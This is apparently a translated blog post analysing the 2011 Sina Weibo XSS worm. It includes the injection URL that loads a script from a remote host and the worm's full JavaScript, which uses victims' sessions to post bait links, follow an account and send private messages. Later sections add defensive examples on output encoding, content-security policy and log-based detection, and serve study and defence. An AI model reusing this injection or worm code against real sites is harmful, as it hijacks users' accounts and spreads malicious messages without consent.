Sina Weibo XSS attack event

Source: Internet
Author: User

On June 28, Sina Weibo suffered a large-scale XSS attack. A large number of users automatically posted Weibo messages and private messages such as "Some unnoticed details of the Guo Meimei incident", "Helping people in the great business of founding the Party", "100 poems that make a woman's heart beat", "3D meat troupe HD Mandarin seed", "This is the legend of the fairy companion" and "Shocking! Fan Bingbing's photo has actually leaked", and automatically followed a user named hellosamy.

The course of the event was as follows:

  • A large number of verified ("V") users were infected and began forwarding the worm.
  • The virus page on 2kt.cn became inaccessible.
  • The hellosamy user on Sina Weibo became inaccessible.
  • Sina completed the fix for the vulnerability.

  Sina Weibo XSS event

Here I want to introduce XSS attacks, also known as cross-site scripting attacks. You can find many articles about them through Google; here I will only give a brief description. First, we all know that many websites can "remember your username and password" or "log you in automatically". In fact this is done by setting a cookie locally. It saves you from typing your username and password every time, but it also brings a lot of problems. Imagine a user who is in the "automatically logged in" state, and a program that accesses some links on that website and submits some forms: the program can talk to the server-side code without anyone entering a username and password by hand. That is the most basic idea behind XSS attacks. It is not even limited to "remember my password" or "auto-login": because HTTP is stateless, almost every website sets cookies in your browser to record state, so that your login status is visible across multiple pages. Today's browsers run many pages in multiple tabs or windows, which means your login status can be used freely by any page or window in the same parent process. Of course, you don't have to worry too much that, when you visit other websites, their JS code will access your Weibo or online-banking pages: because of browser security, JS can only access resources of its own website. But this is a check performed by the browser, so a browser does not necessarily perform it, which is one reason IE6 is one of the most insecure browsers in history; as long as you are not using IE6 you are fine. There are two methods of XSS attack:
  • Like SQL injection or command injection, the attacker injects a script into the server. When a user visits a URL on that server, the URL pulls in the remote JS, and that JS may perform many operations automatically; in this event, for example, it posted Weibo messages and sent on-site private messages on the user's behalf. There are many injection routes, such as submitting forms, modifying URL parameters, uploading images, setting signatures, and so on.
  • The other type is an external attack. It mainly means constructing a web page with an XSS cross-site vulnerability, or finding a page with a cross-site vulnerability on a machine other than the target. For example, to penetrate a website we build a cross-site page, host it on our own server, and then use other techniques such as social engineering to trick the target server's administrator into opening it. This type of attack poses a relatively low threat; at least it is very hard for Ajax to initiate cross-site calls (you may need a hacked browser).

The Sina Weibo event is of the first kind: a URL on the Weibo "square" page http://weibo.com/pub/star was used to inject a JS script, and the link was spread through the short-link service as http://163.fm/PxZHoxn. The link:

Code:
http://weibo.com/pub/star/g/xyyyd%22%3E%3Cscript%20src=//www.2kt.cn/images/t.js%3E%3C/script%3E?type=update 
Note that, once percent-decoded, the path segment after /pub/star/g/ starts with xyyyd"> : the %22%3E closes whatever quoted attribute the value is reflected into, and the rest is rendered as a new tag. The above URL is therefore actually
Code:
<script src="//www.2kt.cn/images/t.js"></script>
The attacker is not necessarily from 2kt.cn, because .cn domains are strictly regulated by the state; I personally doubt this person would be foolish enough to use their own domain name to attack the server.
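To make the injection concrete from the defender's side, here is an added example (not code from the original post, and not Weibo's own page source): it decodes the attack URL quoted above, reflects the decoded segment into a hypothetical href attribute the way the vulnerable page evidently did, and shows the two defences that neutralise it. Output encoding (HTML attribute escaping) removes the break-out entirely; a Content-Security-Policy script-src, which is a defence the post predates and is shown here for illustration, would additionally refuse to load the foreign loader //www.2kt.cn/images/t.js. The template, the policy and the host static.example are constructed assumptions.

```javascript
// Added example (not code from the original post): how the attack URL breaks out of an
// HTML attribute, and what output encoding and a CSP do about it. Node.js, no dependencies.

// The attack URL quoted in the post, exactly as a browser would request it.
const ATTACK_URL =
  'http://weibo.com/pub/star/g/xyyyd%22%3E%3Cscript%20src=//www.2kt.cn/images/t.js%3E%3C/script%3E?type=update';

// Recover the HTML hidden in the path: everything after /pub/star/g/, percent-decoded.
function decodedPathSegment(url) {
  const prefix = '/pub/star/g/';
  const path = new URL(url).pathname;
  return decodeURIComponent(path.slice(path.indexOf(prefix) + prefix.length));
}

// Assumed (hypothetical) server-side template: the segment is reflected into a quoted
// href attribute without encoding. This models the behaviour the post describes;
// the real Weibo page source is not on the page.
function renderVulnerable(segment) {
  return '<a href="/pub/star/g/' + segment + '">star</a>';
}

// HTML attribute encoding: the five characters that can end a quoted attribute or start a tag.
function escapeHtmlAttr(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}

// Hardened rendering: same template, value encoded before insertion.
function renderHardened(segment) {
  return '<a href="/pub/star/g/' + escapeHtmlAttr(segment) + '">star</a>';
}

// Does the rendered markup contain a live <script> tag?
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// Minimal Content-Security-Policy check for script-src only ('self' and origin sources).
// Second line of defence: the worm's loader lives on a foreign origin (www.2kt.cn).
function scriptAllowedByCsp(policy, pageOrigin, scriptSrc) {
  const directive = policy.split(';').map((d) => d.trim()).find((d) => d.startsWith('script-src'));
  if (!directive) return true; // no script-src: nothing restricted here (default-src ignored for brevity)
  const target = new URL(scriptSrc, pageOrigin).origin; // resolves scheme-relative //host/... against the page
  return directive.split(/\s+/).slice(1).some((src) => {
    if (src.startsWith("'")) return src === "'self'" && target === pageOrigin;
    try { return new URL(src).origin === target; } catch (e) { return false; }
  });
}

// Constructed policy for illustration; static.example is a placeholder host.
const EXAMPLE_CSP = "default-src 'self'; script-src 'self' https://static.example";

function demo() {
  const segment = decodedPathSegment(ATTACK_URL);
  return {
    segment,
    vulnerable: renderVulnerable(segment),
    hardened: renderHardened(segment),
    loaderBlockedByCsp: !scriptAllowedByCsp(EXAMPLE_CSP, 'http://weibo.com', '//www.2kt.cn/images/t.js'),
  };
}

console.log(demo());
```

The encoding function is the real fix: a value placed inside a quoted attribute must have at least `"`, `<`, `>` and `&` encoded, and since the value is also used as a URL path, a production template would additionally validate that it contains only the characters a path segment may hold. The CSP check is deliberately tiny (no nonces, hashes, wildcards or `default-src` fallback); it exists only to show that a script-src restricted to the page's own origin would have stopped the loader even if the reflection had remained.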

Others

  • It was initially found that Chrome and Safari were not affected, while IE and Firefox were not spared.
  • The most famous XSS attack in history is the Yamanner worm in Yahoo Mail, a classic XSS instance. The early Yahoo Mail system could execute JavaScript code embedded in a message, and because Yahoo Mail used Ajax, that JavaScript could issue Ajax requests to Yahoo Mail to obtain the user's address book and send the attack code on to others.
  • Why is the user named hellosamy? Because Samy was the first XSS worm, which spread on MySpace.
  • The attack code is here: 06.28_sina_xss.txt (the coding style is quite good)

Code:
// The bootstrap at the bottom re-injects t.js into the opener window; main() then performs
// three actions with the victim's own session cookies: publish a post, follow uid 2201270010,
// and send the bait as a private message to up to five accounts the victim follows.
function createXHR() {
    // Cross-browser XMLHttpRequest (ActiveX fallback for old IE)
    return window.XMLHttpRequest ?
        new XMLHttpRequest() :
        new ActiveXObject("Microsoft.XMLHTTP");
}

function getappkey(url) {
    // Fetches the victim's "follow" page synchronously and scrapes user names out of
    // namecard="true" title="..." attributes; returns them joined by '|'.
    xmlHttp = createXHR();
    xmlHttp.open("GET", url, false);
    xmlHttp.send();
    result = xmlHttp.responseText;
    id_arr = '';
    id = result.match(/namecard=\"true\" title=\"[^\"]*/g);
    for (i = 0; i < id.length; i++) {
        sum = id[i].toString().split('"')[3];
        id_arr += sum + '|';
    }
    return id_arr;
}

function random_msg() {
    // Picks one of the bait headlines and appends the short link with a cache-busting id
    link = 'http://163.fm/PxZHoxn?id=' + new Date().getTime();
    var msgs = [
        'some unnoticed details of the Guo Meimei event:',
        'helping people in the great business of the founding of the Party:',
        'the 100 poems that make a woman\'s heart beat:',
        '3D meat regiment HD Mandarin seed:',
        'this is the legend of the fairy:',
        'shocking! Fan Bingbing\'s photo has really flowed out:',
        'Yang Mi has been cracked many times and is under a rule:',
        'dumb grabs a bank with a hammer:',
        'software that can listen to others\' mobile phones:',
        'tax start point is expected to rise to 4000:'
    ];
    var msg = msgs[Math.floor(Math.random() * msgs.length)] + link;
    msg = encodeURIComponent(msg);
    return msg;
}

function post(url, data, sync) {
    // Form-encoded POST; the browser attaches the victim's weibo.com cookies automatically
    xmlHttp = createXHR();
    xmlHttp.open("POST", url, sync);
    xmlHttp.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
    xmlHttp.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8");
    xmlHttp.send(data);
}

function publish() {
    // Posts a bait message from the victim's account
    url = 'http://weibo.com/mblog/publish.php?rnd=' + new Date().getTime();
    data = 'content=' + random_msg() + '&pic=&styleid=2&retcode=';
    post(url, data, true);
}

function follow() {
    // Makes the victim follow uid 2201270010 (the account every victim was made to follow)
    url = 'http://weibo.com/attention/aj_addfollow.php?refer_sort=profile&atnId=profile&rnd=' + new Date().getTime();
    data = 'uid=' + 2201270010 + '&fromuid=' + $CONFIG.$uid + '&refer_sort=profile&atnId=profile';
    post(url, data, true);
}

function message() {
    // Sends the bait as a private message to up to five accounts the victim follows
    url = 'http://weibo.com/' + $CONFIG.$uid + '/follow';
    ids = getappkey(url);
    id = ids.split('|');
    for (i = 0; i < id.length - 1 & i < 5; i++) {
        msgurl = 'http://weibo.com/message/addmsg.php?rnd=' + new Date().getTime();
        msg = random_msg();
        msg = encodeURIComponent(msg);
        user = encodeURIComponent(id[i]);
        data = 'content=' + msg + '&name=' + user + '&retcode=';
        post(msgurl, data, false);
    }
}

function main() {
    try { publish(); } catch (e) {}
    try { follow(); } catch (e) {}
    try { message(); } catch (e) {}
}

// Re-inject the loader into the window that opened this one, run, then bounce to a normal page
try {
    x = "g=document.createElement('script');g.src='http://www.2kt.cn/images/t.js';document.body.appendChild(g)";
    window.opener.eval(x);
} catch (e) {}
main();
var t = setTimeout('location="http://weibo.com/pub/topic";', 5000);
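Seen from the server side, a worm like this leaves a very characteristic trace: many distinct accounts publishing the same short link within minutes, and each of them also issuing a follow request for the same uid. The following is an added example, not code from the post or from Sina, of detection logic run over a few constructed request-log lines. The log format ("<epoch-seconds> <uid> <method> <path> <body>") is invented for the example; the endpoint paths, the short link and the uid 2201270010 are the ones the worm code above uses.

```javascript
// Added example (not from the original post): burst detection for worm-style posts over
// constructed request logs. Node.js, no dependencies.
// Constructed log format, one request per line: "<epoch-seconds> <uid> <method> <path> <body>"

const SAMPLE_LOG = [
  '1309263240 1001 POST /mblog/publish.php?rnd=1 content=Some+unnoticed+details%3A+http%3A%2F%2F163.fm%2FPxZHoxn%3Fid%3D1309263240001&pic=&styleid=2',
  '1309263241 1001 POST /attention/aj_addfollow.php?rnd=2 uid=2201270010&fromuid=1001',
  '1309263255 1002 POST /mblog/publish.php?rnd=3 content=Shocking%21+http%3A%2F%2F163.fm%2FPxZHoxn%3Fid%3D1309263255002',
  '1309263256 1002 POST /attention/aj_addfollow.php?rnd=4 uid=2201270010&fromuid=1002',
  '1309263290 1003 POST /mblog/publish.php?rnd=5 content=100+poems%3A+http%3A%2F%2F163.fm%2FPxZHoxn%3Fid%3D1309263290003',
  '1309263291 1003 POST /attention/aj_addfollow.php?rnd=6 uid=2201270010&fromuid=1003',
  '1309263300 1004 POST /mblog/publish.php?rnd=7 content=http%3A%2F%2F163.fm%2FPxZHoxn%3Fid%3D1309263300004',
  '1309263320 1005 POST /mblog/publish.php?rnd=8 content=lunch+http%3A%2F%2Fexample.com%2Fnoodles',
  '1309263330 1005 POST /attention/aj_addfollow.php?rnd=9 uid=1001&fromuid=1005',
];

// Parse one constructed log line; the body is form-encoded like the worm's POSTs.
function parseLine(line) {
  const [ts, uid, method, path, body = ''] = line.split(' ');
  return { ts: Number(ts), uid, method, path, params: new URLSearchParams(body) };
}

// Flag every link that is posted by at least minUsers distinct accounts within windowSeconds.
// Links are normalised to origin + path, so the worm's per-post "?id=<time>" suffix does not
// split one campaign into many keys.
function findLinkBursts(records, { windowSeconds = 600, minUsers = 3 } = {}) {
  const postsByLink = new Map();
  for (const r of records) {
    if (r.method !== 'POST' || !r.path.startsWith('/mblog/publish.php')) continue;
    const content = r.params.get('content') || '';
    for (const raw of content.match(/https?:\/\/\S+/g) || []) {
      let key;
      try { const u = new URL(raw); key = u.origin + u.pathname; } catch (e) { continue; }
      if (!postsByLink.has(key)) postsByLink.set(key, []);
      postsByLink.get(key).push({ ts: r.ts, uid: r.uid });
    }
  }
  const bursts = [];
  for (const [link, posts] of postsByLink) {
    posts.sort((a, b) => a.ts - b.ts);
    let peak = 0; // most distinct posters seen inside any single sliding window
    for (let i = 0, j = 0; i < posts.length; i++) {
      while (posts[i].ts - posts[j].ts > windowSeconds) j++;
      peak = Math.max(peak, new Set(posts.slice(j, i + 1).map((p) => p.uid)).size);
    }
    if (peak >= minUsers) {
      bursts.push({ link, peakUsers: peak, users: [...new Set(posts.map((p) => p.uid))].sort() });
    }
  }
  return bursts;
}

// Accounts that both posted a flagged link and followed the worm's uid are almost
// certainly infected sessions rather than people sharing a popular link.
function likelyInfected(records, bursts, wormUid) {
  const followers = new Set(
    records
      .filter((r) => r.path.startsWith('/attention/aj_addfollow.php') && r.params.get('uid') === wormUid)
      .map((r) => r.uid)
  );
  const posters = new Set(bursts.flatMap((b) => b.users));
  return [...posters].filter((u) => followers.has(u)).sort();
}

function analyzeSampleLog() {
  const records = SAMPLE_LOG.map(parseLine);
  const bursts = findLinkBursts(records);
  return { bursts, infected: likelyInfected(records, bursts, '2201270010') };
}

console.log(JSON.stringify(analyzeSampleLog(), null, 2));
```

The two signals are deliberately combined: a link burst alone also fires on genuinely viral content, and a follow burst alone fires on a celebrity joining the site, but the intersection of "posted the link" and "followed the same uid within seconds" is what the worm's main() produces and what a human almost never does. In practice the thresholds would be tuned per site, and the resulting account list is what you feed into session revocation while the injection point is being fixed.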
